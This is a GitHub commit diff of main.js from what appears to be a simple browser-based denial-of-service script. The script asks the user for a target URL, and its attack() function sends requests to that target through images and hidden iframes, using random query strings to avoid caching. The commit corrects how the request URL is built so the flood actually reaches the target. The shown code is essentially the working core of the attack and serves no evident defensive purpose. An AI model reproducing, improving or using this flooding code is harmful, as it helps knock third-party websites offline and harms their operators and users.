We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 7d6c4ff commit e5f2525Copy full SHA for e5f2525
main.js
@@ -2,7 +2,7 @@ var target = prompt("Url");
2
function attack() {
3
var pic = new Image();
4
var rand = Math.floor(Math.random() * 1000);
5
- pic.src = 'http://'+target+rand;
+ pic.src = 'http://'+target+"/?"+rand;
6
7
document.body.innerHTML+='<iframe src="'+target+"/?"+rand+'" style="display:none;"></iframe>';
8
}
0 commit comments